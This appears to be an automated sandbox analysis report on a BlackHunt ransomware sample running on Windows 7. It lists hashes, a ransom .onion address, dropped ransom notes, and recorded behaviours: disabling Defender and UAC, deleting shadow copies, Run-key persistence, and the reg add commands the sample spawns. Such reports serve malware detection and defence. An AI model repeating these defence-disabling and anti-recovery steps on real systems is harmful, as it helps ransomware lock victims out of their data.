Analysis
-
max time kernel
260s -
max time network
289s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:55
Static task
static1
Behavioral task
behavioral1
Sample
cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe
Resource
win10v2004-20231215-en
General
-
Target
cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe
-
Size
707KB
-
MD5
c08ed3f2a66373116775d9d0bdc5f89f
-
SHA1
f4a6d69dac3b9ad057d58c99aecde9144b06df43
-
SHA256
cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a
-
SHA512
7c3ddda04cddb04ca5a8547c1e4ef25e3e6849a137b0277521c86f1603bf6ddd1e93a67aa8c5a914b36da35b6f228d3f24267fa377b9b838fb0a8b9fcb7de150
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1K8Evnh:6uaTmkZJ+naie5OTamgEoKxLWx6h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 328 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1252 bcdedit.exe 2352 bcdedit.exe -
Renames multiple (110) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 956 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\A: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\X: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\B: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\Y: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\O: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\H: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\Q: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\W: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\T: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\U: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\S: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\L: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\N: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\P: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\K: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\V: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\R: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\I: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\G: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\J: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened (read-only) \??\Z: cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\ca.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\include\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\ConvertCheckpoint.cmd cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_content-background.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Google\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\CompressPing.csv cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureA.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\Lang\ps.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationUp_SelectionSubpicture.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\background.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\ja-JP\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\Lang\sa.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\title_stripe.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\pagecurl.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\Lang\it.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\Lang\tg.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationRight_SelectionSubpicture.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\7zCon.sfx cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\include\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\Shared\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_ButtonGraphic.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationRight_SelectionSubpicture.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_rgb.wmv cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_SelectionSubpicture.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-next-static.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\#BlackHunt_ReadMe.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\bod_r.TTF cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\curtains.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\203x8subpicture.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\#BlackHunt_Private.key cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\1047x576black.png cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\#BlackHunt_ReadMe.hta cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2004 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 608 vssadmin.exe 240 vssadmin.exe 1656 vssadmin.exe 2272 vssadmin.exe 1508 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeRestorePrivilege 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeBackupPrivilege 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeTakeOwnershipPrivilege 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeAuditPrivilege 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeSecurityPrivilege 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeIncBasePriorityPrivilege 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Token: SeBackupPrivilege 1700 vssvc.exe Token: SeRestorePrivilege 1700 vssvc.exe Token: SeAuditPrivilege 1700 vssvc.exe Token: SeBackupPrivilege 2668 wbengine.exe Token: SeRestorePrivilege 2668 wbengine.exe Token: SeSecurityPrivilege 2668 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2824 wrote to memory of 1936 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 27 PID 2824 wrote to memory of 1936 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 27 PID 2824 wrote to memory of 1936 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 27 PID 2824 wrote to memory of 1936 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 27 PID 2824 wrote to memory of 1940 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 28 PID 2824 wrote to memory of 1940 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 28 PID 2824 wrote to memory of 1940 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 28 PID 2824 wrote to memory of 1940 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 28 PID 2824 wrote to memory of 1976 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 29 PID 2824 wrote to memory of 1976 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 29 PID 2824 wrote to memory of 1976 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 29 PID 2824 wrote to memory of 1976 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 29 PID 2824 wrote to memory of 1964 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 33 PID 2824 wrote to memory of 1964 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 33 PID 2824 wrote to memory of 1964 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 33 PID 2824 wrote to memory of 1964 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 33 PID 2824 wrote to memory of 2476 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 34 PID 2824 wrote to memory of 2476 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 34 PID 2824 wrote to memory of 2476 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 34 PID 2824 wrote to memory of 2476 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 34 PID 2824 wrote to memory of 2512 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 35 PID 2824 wrote to memory of 2512 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 35 PID 2824 wrote to memory of 2512 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 35 PID 2824 wrote to memory of 2512 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 35 PID 2824 wrote to memory of 2488 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 36 PID 2824 wrote to memory of 2488 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 36 PID 2824 wrote to memory of 2488 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 36 PID 2824 wrote to memory of 2488 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 36 PID 2824 wrote to memory of 828 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 37 PID 2824 wrote to memory of 828 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 37 PID 2824 wrote to memory of 828 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 37 PID 2824 wrote to memory of 828 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 37 PID 2824 wrote to memory of 1240 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 38 PID 2824 wrote to memory of 1240 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 38 PID 2824 wrote to memory of 1240 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 38 PID 2824 wrote to memory of 1240 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 38 PID 2824 wrote to memory of 1336 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 41 PID 2824 wrote to memory of 1336 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 41 PID 2824 wrote to memory of 1336 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 41 PID 2824 wrote to memory of 1336 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 41 PID 2824 wrote to memory of 1972 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 43 PID 2824 wrote to memory of 1972 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 43 PID 2824 wrote to memory of 1972 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 43 PID 2824 wrote to memory of 1972 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 43 PID 2824 wrote to memory of 1680 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 45 PID 2824 wrote to memory of 1680 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 45 PID 2824 wrote to memory of 1680 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 45 PID 2824 wrote to memory of 1680 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 45 PID 2824 wrote to memory of 1668 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 53 PID 2824 wrote to memory of 1668 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 53 PID 2824 wrote to memory of 1668 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 53 PID 2824 wrote to memory of 1668 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 53 PID 2824 wrote to memory of 2348 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 47 PID 2824 wrote to memory of 2348 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 47 PID 2824 wrote to memory of 2348 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 47 PID 2824 wrote to memory of 2348 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 47 PID 2824 wrote to memory of 2660 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 54 PID 2824 wrote to memory of 2660 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 54 PID 2824 wrote to memory of 2660 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 54 PID 2824 wrote to memory of 2660 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 54 PID 2824 wrote to memory of 2944 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 56 PID 2824 wrote to memory of 2944 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 56 PID 2824 wrote to memory of 2944 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 56 PID 2824 wrote to memory of 2944 2824 cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe 56 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe"C:\Users\Admin\AppData\Local\Temp\cc5fd3bd253f1286c971815101cf96153527720fbee0a6209c60695be9366b2a.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2824 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵PID:1936
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1940
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:1976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1164
-
-
-
